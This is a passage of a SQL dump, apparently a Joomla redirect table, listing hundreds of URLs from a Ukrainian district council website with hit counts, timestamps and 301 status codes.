00:00:00',301),(17520,'http://malyn-rayrada.org.ua/attachments/article/1195/Діброва(1).pdf','','','',7,0,'2015-11-06 03:58:37','0000-00-00 00:00:00',301),(17521,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/557-pro-zatverdzhennja-rozporjadzhennja-golovi','','','',10,0,'2015-11-06 04:47:29','0000-00-00 00:00:00',301),(17522,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/594-pro-zatverdzhennja-rozmiru-vartosti-produktiv_4?tmpl=component&print=1&layout=default&page=','','','',8,0,'2015-11-06 04:47:31','0000-00-00 00:00:00',301),(17523,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/452-pro-spisannja-osnovnih-zasobiv_3?tmpl=component&print=1&layout=default&page=','','','',8,0,'2015-11-06 04:47:32','0000-00-00 00:00:00',301),(17524,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/504-pro-pogodzhennja-statusu-malinskoi-ditjachoi','','','',9,0,'2015-11-06 04:47:34','0000-00-00 00:00:00',301),(17525,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/507-pro-hid-vikonannja-rajonnoi-programi-turbota-na?tmpl=component&print=1&layout=default&page=','','','',10,0,'2015-11-06 04:47:35','0000-00-00 00:00:00',301),(17526,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/508-pro-zvit-golovi-rajonnoi-derzhavnoi-administracii_3','','','',10,0,'2015-11-06 04:47:37','0000-00-00 00:00:00',301),(17527,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/365-pro-pereukladennja-kontraktiv-z-kerivnikami?tmpl=component&print=1&layout=default&page=','','','',8,0,'2015-11-06 04:47:42','0000-00-00 00:00:00',301),(17528,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/383-pro-zamishhennja-deputata-rajonnoi-radi_2','','','',10,0,'2015-11-06 04:47:43','0000-00-00 00:00:00',301),(17529,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-/739-pro-zatverdzhennja-zvitu-pro-vikonannja-rajonnogo_5?tmpl=component&print=1&layout=default&page=','','','',8,0,'2015-11-06 04:47:51','0000-00-00 00:00:00',301),(17530,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-/742-pro-znjattja-z-kontrolju-rishen-rajonnoi-radi_4','','','',10,0,'2015-11-06 04:47:53','0000-00-00 00:00:00',301),(17531,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/109-pro-programu-zabezpechennja-bezpeki-pri-vijavlenni','','','',9,0,'2015-11-06 04:47:54','0000-00-00 00:00:00',301),(17532,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/160-pro-stan-rozrahunkiv-za-majnovi-ta-zemelni-pai?tmpl=component&print=1&layout=default&page=','','','',8,0,'2015-11-06 04:47:57','0000-00-00 00:00:00',301),(17533,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/162-pro-nadannja-zgodi-na-prijnjattja-u-spilnu','','','',6,0,'2015-11-06 04:47:58','0000-00-00 00:00:00',301),(17534,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/168-pro-peredachu-koshtiv-na-zdijsnennja-vidatkiv','','','',3,0,'2015-11-06 04:48:01','0000-00-00 00:00:00',301),(17535,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/34-pro-plan-roboti-rajonnoi-radi-na-ii-pivrichchja?tmpl=component&print=1&layout=default&page=','','','',8,0,'2015-11-06 04:48:03','0000-00-00 00:00:00',301),(17536,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/808-pro-zatverdzhennja-spilnih-rozporjadzhen-golovi_14?tmpl=component&print=1&layout=default&page=','','','',10,0,'2015-11-06 04:48:07','0000-00-00 00:00:00',301),(17537,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/815-pro-zatverdzhennja-rozmiru-groshovoi-kompensacii','','','',3,0,'2015-11-06 04:48:08','0000-00-00 00:00:00',301),(17538,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/130-pro-zatverdzhennja-spilnih-rozporjadzhen-golovi_4?tmpl=component&print=1&layout=default&page=','','','',8,0,'2015-11-06 04:48:10','0000-00-00 00:00:00',301),(17539,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/416-pro-vstanovlennja-mezh-silskih-naselenih-punktiv_2','','','',11,0,'2015-11-06 04:48:15','0000-00-00 00:00:00',301),(17540,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/417-pro-peredachu-materialnih-cinnostej_2?tmpl=component&print=1&layout=default&page=','','','',8,0,'2015-11-06 04:48:16','0000-00-00 00:00:00',301),(17541,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/440-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_18?tmpl=component&print=1&layout=default&page=','','','',8,0,'2015-11-06 04:48:18','0000-00-00 00:00:00',301),(17542,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/339-pro-viznannja-takimi-shho-vtratili-chinnist-rishen?tmpl=component&print=1&layout=default&page=','','','',8,0,'2015-11-06 04:48:19','0000-00-00 00:00:00',301),(17543,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/340-pro-zatverdzhennja-polozhennja-pro-porjadok_2?tmpl=component&print=1&layout=default&page=','','','',8,0,'2015-11-06 04:48:20','0000-00-00 00:00:00',301),(17544,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/601-pro-hid-vikonannja-rajonnoi-programi-vidpochinku_4','','','',3,0,'2015-11-06 04:48:22','0000-00-00 00:00:00',301),(17545,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/615-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_12?tmpl=component&print=1&layout=default&page=','','','',8,0,'2015-11-06 04:48:23','0000-00-00 00:00:00',301),(17546,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/9-pro-zminu-nazvi-ta-zatverdzhennja-polozhennja?tmpl=component&print=1&layout=default&page=','','','',10,0,'2015-11-06 04:48:47','0000-00-00 00:00:00',301),(17547,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=504:-2012-&catid=38:--19122011-&Itemid=73&lang=ru','','','',5,0,'2015-11-06 06:28:08','0000-00-00 00:00:00',301),(17548,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=524:2011-12-30-10-17-39&catid=38:--19122011-&Itemid=73&lang=ru','','','',4,0,'2015-11-06 06:38:06','0000-00-00 00:00:00',301),(17549,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=530:-4050-vi-l-r-1-2013-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',5,0,'2015-11-06 07:29:51','0000-00-00 00:00:00',301),(17550,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=30&Itemid=61&lang=uk','','','',15,0,'2015-11-06 08:11:02','0000-00-00 00:00:00',301),(17552,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=34&layout=blog&Itemid=68&lang=uk&limitstart=5','','','',2,0,'2015-11-06 09:43:42','0000-00-00 00:00:00',301),(17553,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=317:-l-2008-2012-r&catid=33&Itemid=66&lang=uk','','','',5,0,'2015-11-06 09:44:54','0000-00-00 00:00:00',301),(17554,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=34&Itemid=68&lang=uk&limitstart=5','','','',1,0,'2015-11-06 09:51:49','0000-00-00 00:00:00',301),(17555,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/489-pro-zatverdzhennja-polozhennja-pro-teritorialnij_2?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-11-06 10:36:38','0000-00-00 00:00:00',301),(17556,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=31&Itemid=62&lang=ru','','','',6,0,'2015-11-06 11:16:44','0000-00-00 00:00:00',301),(17557,'http://www.malyn-rayrada.org.ua/index.php/--15042014-/769-pro-zatverdzhennja-rozporjadzhennja-golovi_3','','','',3,0,'2015-11-06 11:22:37','0000-00-00 00:00:00',301),(17558,'http://www.malyn-rayrada.org.ua/index.php?Itemid=98&catid=57:--15042014-&id=1281:2014-04-15-09-13-01&lang=ru&option=com_content&view=article','','','',1,0,'2015-11-06 11:26:54','0000-00-00 00:00:00',301),(17559,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=866:2012-12-14-06-58-01&lang=en&option=com_content&view=article','','','',2,0,'2015-11-06 11:26:55','0000-00-00 00:00:00',301),(17560,'http://www.malyn-rayrada.org.ua/index.php?Itemid=62&catid=31:-25032011&id=272:-2010-&lang=ru&option=com_content&view=article','','','',1,0,'2015-11-06 11:26:55','0000-00-00 00:00:00',301),(17561,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1056:-22-&lang=ru&option=com_content&view=article','','','',1,0,'2015-11-06 11:51:43','0000-00-00 00:00:00',301),(17562,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=472:-l-r-&catid=38:--19122011-&Itemid=73&lang=ru','','','',3,0,'2015-11-06 11:59:02','0000-00-00 00:00:00',301),(17563,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/608-pro-prodovzhennja-dii-kontraktu-z-kerivnikom','','','',47,0,'2015-11-06 12:11:03','0000-00-00 00:00:00',301),(17565,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=503:-2017-&catid=38:--19122011-&Itemid=73&lang=ru','','','',2,0,'2015-11-06 15:45:02','0000-00-00 00:00:00',301),(17566,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=733:-10-&lang=en&option=com_content&view=article','','','',1,0,'2015-11-06 18:13:42','0000-00-00 00:00:00',301),(17567,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/630-pro-orendu-ob’ekta-spilnoi-vlasnosti-teritorialnih','','','',3,0,'2015-11-06 18:37:39','0000-00-00 00:00:00',301),(17568,'http://www.malyn-rayrada.org.ua/index.php?Itemid=61&catid=30&id=230:---3----6--30--2010-&lang=ru&option=com_content&view=article','','','',3,0,'2015-11-06 19:22:49','0000-00-00 00:00:00',301),(17571,'http://www.malyn-rayrada.org.ua/index.php?Itemid=72&catid=37:--21102011-&id=444:2011-10-24-07-04-45&lang=uk&option=com_content&view=article','','','',1,0,'2015-11-06 22:34:16','0000-00-00 00:00:00',301),(17572,'http://www.malyn-rayrada.org.ua/index.php?Itemid=66&id=33:-20052011&lang=uk&layout=blog&option=com_content&view=category','','','',3,0,'2015-11-06 22:57:45','0000-00-00 00:00:00',301),(17573,'http://www.malyn-rayrada.org.ua/index.php?Itemid=85&catid=46&id=867:2012-12-14-10-13-30&lang=uk&option=com_content&view=article','','','',2,0,'2015-11-06 22:57:45','0000-00-00 00:00:00',301),(17574,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=51&Itemid=92&lang=uk','','','',15,0,'2015-11-06 23:01:31','0000-00-00 00:00:00',301),(17575,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&id=53:--25102013-&lang=uk&layout=blog&limitstart=5&option=com_content&view=category','','','',5,0,'2015-11-07 00:34:37','0000-00-00 00:00:00',301),(17576,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1070-oprilyudnennya-vidomostej-pro-dokhodi-za-2014-rik-kerivnitstva-ukrajinkivskoji-silskoji-radi?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-07 01:05:52','0000-00-00 00:00:00',301),(17577,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-/735-pro-skasuvannja-rishen-rajonnoi-radi-vid-25','','','',8,0,'2015-11-07 01:06:52','0000-00-00 00:00:00',301),(17578,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=819:2012-11-14-16-40-09&catid=45:--14112012-&Itemid=84&lang=uk','','','',4,0,'2015-11-07 01:09:18','0000-00-00 00:00:00',301),(17579,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=822:----------2012--2013-----------------l-r&catid=45&Itemid=84&lang=uk','','','',4,0,'2015-11-07 01:09:28','0000-00-00 00:00:00',301),(17580,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=822:----------2012--2013-----------------l-r&catid=45:--14112012-&Itemid=84&lang=uk','','','',6,0,'2015-11-07 01:09:30','0000-00-00 00:00:00',301),(17581,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=823:2012-11-14-16-52-28&catid=45&Itemid=84&lang=uk','','','',4,0,'2015-11-07 01:09:31','0000-00-00 00:00:00',301),(17582,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=823:2012-11-14-16-52-28&catid=45:--14112012-&Itemid=84&lang=uk','','','',5,0,'2015-11-07 01:09:34','0000-00-00 00:00:00',301),(17583,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=824:-2012-&catid=45&Itemid=84&lang=uk','','','',4,0,'2015-11-07 01:09:35','0000-00-00 00:00:00',301),(17584,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=824:-2012-&catid=45:--14112012-&Itemid=84&lang=en','','','',4,0,'2015-11-07 01:09:37','0000-00-00 00:00:00',301),(17585,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=824:-2012-&catid=45:--14112012-&Itemid=84&lang=ru','','','',4,0,'2015-11-07 01:09:38','0000-00-00 00:00:00',301),(17586,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=824:-2012-&catid=45:--14112012-&Itemid=84&lang=uk','','','',4,0,'2015-11-07 01:09:47','0000-00-00 00:00:00',301),(17587,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=828:-q-q&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',4,0,'2015-11-07 01:09:49','0000-00-00 00:00:00',301),(17588,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38&id=489:2011-12-02-06-51-07&lang=uk&option=com_content&view=article','','','',1,0,'2015-11-07 02:04:47','0000-00-00 00:00:00',301),(17589,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--26122013-/688-pro-zminu-nazvi-novovorob’ivskogo-zagalnoosvitnogo','','','',3,0,'2015-11-07 02:37:36','0000-00-00 00:00:00',301),(17590,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=51&Itemid=92&lang=uk&limitstart=15','','','',3,0,'2015-11-07 02:37:36','0000-00-00 00:00:00',301),(17591,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=38&Itemid=73&lang=en&limitstart=5','','','',5,0,'2015-11-07 02:37:58','0000-00-00 00:00:00',301),(17592,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/351-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_5','','','',14,0,'2015-11-07 02:38:04','0000-00-00 00:00:00',301),(17593,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=40&Itemid=77&lang=en&limitstart=5','','','',5,0,'2015-11-07 02:38:04','0000-00-00 00:00:00',301),(17594,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/804-pro-vnesennja-zmin-do-rishennja-rajonnoi-radi-vid_6','','','',17,0,'2015-11-07 02:42:35','0000-00-00 00:00:00',301),(17595,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/168-pro-peredachu-koshtiv-na-zdijsnennja-vidatkiv','','','',32,0,'2015-11-07 02:53:31','0000-00-00 00:00:00',301),(17597,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=773:2012-10-02-06-48-57&catid=45:--14112012-&Itemid=84&lang=en','','','',4,0,'2015-11-07 02:56:55','0000-00-00 00:00:00',301),(17598,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=38&layout=blog&Itemid=73&lang=uk&limitstart=10','','','',1,0,'2015-11-07 03:18:15','0000-00-00 00:00:00',301),(17599,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=555:2012-01-27-13-50-13&catid=39:-22022012-&Itemid=76&lang=uk','','','',1,0,'2015-11-07 03:34:14','0000-00-00 00:00:00',301),(17600,'http://www.malyn-rayrada.org.ua/index.php?Itemid=68&id=34:--15062011-&lang=ru&layout=blog&limitstart=5&option=com_content&view=category','','','',3,0,'2015-11-07 04:42:00','0000-00-00 00:00:00',301),(17601,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/490-pro-pogodzhennja-perejmenuvannja-naselenogo-punktu?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-11-07 05:36:33','0000-00-00 00:00:00',301),(17602,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=57&Itemid=98&lang=uk','','','',2,0,'2015-11-07 05:58:15','0000-00-00 00:00:00',301),(17603,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=779:2012-10-03-12-34-44&lang=uk&option=com_content&view=article','','','',4,0,'2015-11-07 06:14:43','0000-00-00 00:00:00',301),(17604,'http://www.malyn-rayrada.org.ua/index.php?Itemid=62&id=31&lang=en&layout=blog&option=com_content&view=category','','http://go.mail.ru/search_images','',3,0,'2015-11-07 06:22:45','0000-00-00 00:00:00',301),(17605,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1058-oprilyudnennya-vydomostej-pro-dokhodi-za-2014-rik-kerivnitstva-ivanivskoji-silskoji-radi?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-11-07 06:37:23','0000-00-00 00:00:00',301),(17606,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1062-oprilyudnennya-vidomostej-pro-dokhodi-za-2014-rik-kerivnitstva-lukivskoji-silskoji-radi','','','',5,0,'2015-11-07 06:37:24','0000-00-00 00:00:00',301),(17607,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1062-oprilyudnennya-vidomostej-pro-dokhodi-za-2014-rik-kerivnitstva-lukivskoji-silskoji-radi?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-11-07 06:37:27','0000-00-00 00:00:00',301),(17608,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1079-oprilyudnennya-vidomostej-pro-dokhodi-za-2014-rik-kerivnitstva-dibrivskoji-silskoji-radi?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-07 06:37:29','0000-00-00 00:00:00',301),(17609,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1081-oprilyudnennya-vidomostej-pro-dokhodi-za-2014-rik-kerivnitstva-granitnenskoji-selishchnoji-radi?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-07 06:37:31','0000-00-00 00:00:00',301),(17610,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1138-vishivska-silska-rada-informue','','','',3,0,'2015-11-07 06:37:32','0000-00-00 00:00:00',301),(17611,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1138-vishivska-silska-rada-informue?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-11-07 06:37:34','0000-00-00 00:00:00',301),(17612,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1150-dibrivska-silska-rada-informue','','','',5,0,'2015-11-07 06:37:35','0000-00-00 00:00:00',301),(17613,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/451-pro-vnesennja-dopovnennja-do-programi','','','',4,0,'2015-11-07 06:38:05','0000-00-00 00:00:00',301),(17614,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-/736-pro-zatverdzhennja-polozhennja-pro-konkursnij_2','','','',6,0,'2015-11-07 06:38:15','0000-00-00 00:00:00',301),(17615,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/429-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_17','','','',2,0,'2015-11-07 06:38:24','0000-00-00 00:00:00',301),(17616,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/431-pro-zatverdzhennja-porjadku-i-normativiv_2','','','',5,0,'2015-11-07 06:38:25','0000-00-00 00:00:00',301),(17617,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/444-pro-pogodzhennja-vvedennja-shtatnoi-odinici_2?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-07 06:38:27','0000-00-00 00:00:00',301),(17618,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/275-pro-zatverdzhennja-novogo-skladu-komisii-rajonnoi_2','','','',5,0,'2015-11-07 06:38:28','0000-00-00 00:00:00',301),(17619,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/334-pro-vnesennja-zmin-do-rishennja-rajonnoi-radi-vid_3','','','',2,0,'2015-11-07 06:38:30','0000-00-00 00:00:00',301),(17620,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/335-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_4','','','',2,0,'2015-11-07 06:38:31','0000-00-00 00:00:00',301),(17621,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/341-pro-zatverdzhennja-polozhennja-pro-orendu-majna_2','','','',2,0,'2015-11-07 06:38:33','0000-00-00 00:00:00',301),(17622,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/608-pro-prodovzhennja-dii-kontraktu-z-kerivnikom?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-11-07 06:38:34','0000-00-00 00:00:00',301),(17623,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/609-pro-prodovzhennja-dii-kontraktu-z-kerivnikom-kp_3','','','',2,0,'2015-11-07 06:38:36','0000-00-00 00:00:00',301),(17624,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/612-pro-vnesennja-zmin-do-programi-zajnjatosti_3','','','',5,0,'2015-11-07 06:38:37','0000-00-00 00:00:00',301),(17625,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/623-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_14','','','',7,0,'2015-11-07 06:38:39','0000-00-00 00:00:00',301),(17626,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/629-pro-peredachu-budivli-lokomotivnogo-depo-na-balans?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-11-07 06:38:40','0000-00-00 00:00:00',301),(17627,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/213-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_7','','','',5,0,'2015-11-07 06:38:59','0000-00-00 00:00:00',301),(17628,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/322-pro-zatverdzhennja-kompleksnoi-programi-protidii','','','',6,0,'2015-11-07 06:39:00','0000-00-00 00:00:00',301),(17629,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/356-pro-zatverdzhennja-programi-rozvitku-malogo-i','','','',3,0,'2015-11-07 06:39:02','0000-00-00 00:00:00',301),(17630,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/412-pro-programu-socialno-ekonomichnogo-rozvitku_3?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-11-07 06:39:03','0000-00-00 00:00:00',301),(17631,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/489-pro-zatverdzhennja-polozhennja-pro-teritorialnij_2','','','',5,0,'2015-11-07 06:39:09','0000-00-00 00:00:00',301),(17632,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku/985-pro-zatverdzhennya-strukturi-ta-chiselnosti-vikonavchogo-aparatu-radi-vitrat-na-jogo-utrimannya','','','',5,0,'2015-11-07 06:39:11','0000-00-00 00:00:00',301),(17633,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku/995-pro-vstanovlennya-rozmiru-vartosti-kharchuvannya-ta-batkivskoji-plati-u-doshkilnikh-navchalnikh-zakladakh','','','',8,0,'2015-11-07 06:39:12','0000-00-00 00:00:00',301),(17634,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/76-rishennya-vid-29-07-2015-roku/1171-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2015-rik?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-07 06:39:13','0000-00-00 00:00:00',301),(17635,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/58-rishennja-radi/rishennja/--19122011-?lang=ru&start=21','','http://go.mail.ru/search_images','',6,0,'2015-11-07 07:25:57','0000-00-00 00:00:00',301),(17636,'http://malyn-rayrada.org.ua/attachments/article/1122/Захарчук.pdf','','','',3,0,'2015-11-07 08:57:39','0000-00-00 00:00:00',301),(17637,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1012-pro-zatverdzhennya-tekhnichnoji-dokumentatsiji-po-viznachennyu-normativnoji-groshovoji-otsinki-zemelnoji-dilyanki','','','',7,0,'2015-11-07 09:53:15','0000-00-00 00:00:00',301),(17638,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-?limitstart=0','','','',6,0,'2015-11-07 09:55:43','0000-00-00 00:00:00',301),(17639,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/451-pro-vnesennja-dopovnennja-do-programi','','','',37,0,'2015-11-07 09:56:01','0000-00-00 00:00:00',301),(17640,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=52:--16082013-&layout=blog&Itemid=93&lang=en','','','',3,0,'2015-11-07 09:56:30','0000-00-00 00:00:00',301),(17641,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=9:2010-06-05-15-10-04&catid=7&Itemid=12&lang=en','','','',3,0,'2015-11-07 10:16:56','0000-00-00 00:00:00',301),(17642,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=40&Itemid=77&lang=en&limitstart=15','','','',3,0,'2015-11-07 10:17:39','0000-00-00 00:00:00',301),(17643,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/965-pro-vnesennya-zmin-do-kompleksnoji-dovgostrokovoji-programi-rozvitku-zemelnikh-vidnosin-ta-okhoroni-zemel-u-malinskomu-rajoni-na-2007-2015-roki','','','',6,0,'2015-11-07 10:20:14','0000-00-00 00:00:00',301),(17647,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/572-pro-zatverdzhennja-proektu-zemleustroju-shhodo','','','',6,0,'2015-11-07 12:05:32','0000-00-00 00:00:00',301),(17649,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=38&Itemid=73&lang=ru&limitstart=25','','','',2,0,'2015-11-07 12:48:17','0000-00-00 00:00:00',301),(17650,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=38&Itemid=73&lang=ru&limitstart=15','','','',2,0,'2015-11-07 12:54:10','0000-00-00 00:00:00',301),(17651,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=38&layout=blog&Itemid=73&lang=ru&limitstart=25','','','',1,0,'2015-11-07 13:08:16','0000-00-00 00:00:00',301),(17652,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=38&layout=blog&Itemid=73&lang=ru&limitstart=15','','','',1,0,'2015-11-07 13:36:15','0000-00-00 00:00:00',301),(17653,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=38&Itemid=73&lang=ru&limitstart=25','','','',1,0,'2015-11-07 14:04:26','0000-00-00 00:00:00',301),(17654,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=38&Itemid=73&lang=ru&limitstart=10','','','',1,0,'2015-11-07 14:24:07','0000-00-00 00:00:00',301),(17656,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=38&layout=blog&Itemid=73&lang=ru&limitstart=10','','','',1,0,'2015-11-07 15:07:10','0000-00-00 00:00:00',301),(17657,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=38&Itemid=73&lang=ru&limitstart=15','','','',1,0,'2015-11-07 15:18:29','0000-00-00 00:00:00',301),(17658,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=665:-75-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',1,0,'2015-11-07 15:18:42','0000-00-00 00:00:00',301),(17659,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=43:--25072012-&layout=blog&Itemid=82&lang=uk&limitstart=10','','','',1,0,'2015-11-07 15:29:58','0000-00-00 